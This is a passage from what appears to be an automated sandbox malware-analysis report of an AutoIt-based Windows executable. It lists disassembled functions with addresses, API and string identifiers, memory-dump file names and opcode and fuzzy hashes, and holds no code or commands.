                                                                                                                                                                                                                    • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                                                                                                                                                    • Instruction ID: c9b5a88aafd485283bca2adac7cf7b7b204707fdb7ce422652d23215f7d0623b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B91C122B1A65782EA648F26D4415B923A0BB15791B584B31DE9DF3BD4DFBFEC42C300
                                                                                                                                                                                                                    Function 00007FF656D46920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                                                                                                                    • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                                                                                                                    • Instruction ID: 75346cec77d2b8c490f9f44e35789e1652bcda73a9dfa74ed9572df0b43ca91f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2791BF66B08B9285EB10DF65E4401AD3374FF88B88F494A32DE8EA7755DF7AE845C340
                                                                                                                                                                                                                    Function 00007FF656D20EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00007FF656D20EDB
                                                                                                                                                                                                                      • Part of subcall function 00007FF656D20B90: CharUpperBuffW.USER32(?,?,00000001,00007FF656D20F61), ref: 00007FF656D20C6A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharForegroundUpperWindow
                                                                                                                                                                                                                    • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                                                                                                                                                    • API String ID: 3570115564-1994484594
                                                                                                                                                                                                                    • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                                                                                                                                    • Instruction ID: 28382312b6abbcb59a0153f44089fbfcab2308eac25d0580ff44971d0b6856dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09719252B0968381FE649B66DC012BE62A1AF54784F8C8B31DA0EE67D5EF3EE544C340
                                                                                                                                                                                                                    Function 00007FF656D29898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                                                                                                                    • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                                                                                                                    • Instruction ID: 62c83b788620a278c9a35924cb21a022ed08f0cf52a5dc462a2eb4e0ea0565c9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A41D772F1975345EB608F279C44179A291AB64BE0B981B31CA5DE77D4EE3FE852C300
                                                                                                                                                                                                                    Function 00007FF656CE9B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: #$E$O
                                                                                                                                                                                                                    • API String ID: 3215553584-248080428
                                                                                                                                                                                                                    • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                                                                                                                                    • Instruction ID: 0f2df14e2450a7330d3a255a1e49792f0e643f794fb28e369693fcbb6c46ebb4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 654140B2B1975285EF62AF6198421B923B4BF54B88F1C4131EE5DAB799DF3ED841C300
                                                                                                                                                                                                                    Function 00007FF656D2B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 3196045410-1173974218
                                                                                                                                                                                                                    • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                                                                                                                                    • Instruction ID: d2f3ca7b6c9207a73051298c2340f27c0bc921d2b08b7627bebe148d23ec3f47
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7418462A0868395EB60DB24DC401FD2774FF95788F880631DA4DE7A99EF7ADA09C740
                                                                                                                                                                                                                    Function 00007FF656D1DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$ClassName
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 787153527-1403004172
                                                                                                                                                                                                                    • Opcode ID: 70662ca5426fc24266fff73a087b16389f56991358e789cbb6938aae17802828
                                                                                                                                                                                                                    • Instruction ID: c4146ff0854da71e56a1ea6d7710fff26d64dc9e0141252632b0625a7e7edb45
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70662ca5426fc24266fff73a087b16389f56991358e789cbb6938aae17802828
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE31A762A0868286EA20DB11E4511B97360FF89BC0F9C4B31DE5DE7795CF3EE54AC700
                                                                                                                                                                                                                    Function 00007FF656D3D914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                    • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                                                                                                                                    • Instruction ID: d92836d1c94df1e6f83133534b07ce8b8117fedcfed993588ec2cff556968e59
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA31C622B1C68242FB609F11A510AAE6360FB947C0F5C5731DE4DA7B45DE3ED442CB40
                                                                                                                                                                                                                    Function 00007FF656D593E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                                                                                                    • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                                                                                                                                    • Instruction ID: a25ddb33af1c3ed462261f04ef6cc9d09b81e1042754462b567fbce2af55719d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB316D32A097C1CAE7608F24E44476A33A0FB85781F584739DA9997B98DF3ED444CF00
                                                                                                                                                                                                                    Function 00007FF656CD9164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                                                                                                                                    • Instruction ID: 9a099740db13eca7615e51e92d0e7fae0ab001c76e55c4a6fd44ad8d783a458c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF04F65A19A8281EF449B51E49427973B0EF88BD0F8C1635E94F96664DE3DD488C700
                                                                                                                                                                                                                    Function 00007FF656CF89B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                                                                                                                                                                    • Instruction ID: ada6bf01921189be3085d7e562e6f9eed12a58a4de265a6c6dbad6ebd63295a2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AA1B4A2B0A78246FBA1CB6194103B9A6F1EF04BA4F5C4635DA5DA77C5DF3EE484C300
                                                                                                                                                                                                                    Function 00007FF656D445A4 Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLasthtonsinet_ntoa
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2227131780-0
                                                                                                                                                                                                                    • Opcode ID: 9d63c3ff09018787bdf2c8cd65d4ffa6a8cd9859e820862335d7023577324fca
                                                                                                                                                                                                                    • Instruction ID: b9843cf82ca5defc653b6d6b02e979fb6af9a4e3dd3e5dc8da84bed4ca936083
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d63c3ff09018787bdf2c8cd65d4ffa6a8cd9859e820862335d7023577324fca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CA1F462B0868282EB10EB26D4502BD67A0FF85B94F884735DE5ED77A6DF7EE441C700
                                                                                                                                                                                                                    Function 00007FF656D4E838 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                                                                                    • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                                                                                                                                    • Instruction ID: fe218481587e4212e645301c1e6fba9b160dfa21e283c7dc04ebc33a297ed7dc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D081C062B0869185EB04DF22C458AAD37A0BF88FD4F488635DE5EA7B96CF7ED441C740
                                                                                                                                                                                                                    Function 00007FF656CEED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                                                                                                                                                    • Instruction ID: 511694d3240cd48b6c18e37c0dfbfc719ca31fbb398158d2c0f16b8923a3bd3b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C88101A2E1861385F7229B61D4422BD77B0BB4AB88F480235DD0EA37D1DF3EE845C700
                                                                                                                                                                                                                    Function 00007FF656D502DC Relevance: 7.7, APIs: 5, Instructions: 159registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3451389628-0
                                                                                                                                                                                                                    • Opcode ID: 1a68545afe61d840d47d3f1b1d3b03a98aa3fbbe1ee52399c340d1ced92b4485
                                                                                                                                                                                                                    • Instruction ID: b54cd41016fcd89fdf2396ed08375806f7dc119b35d205b81f9379b7653340bc
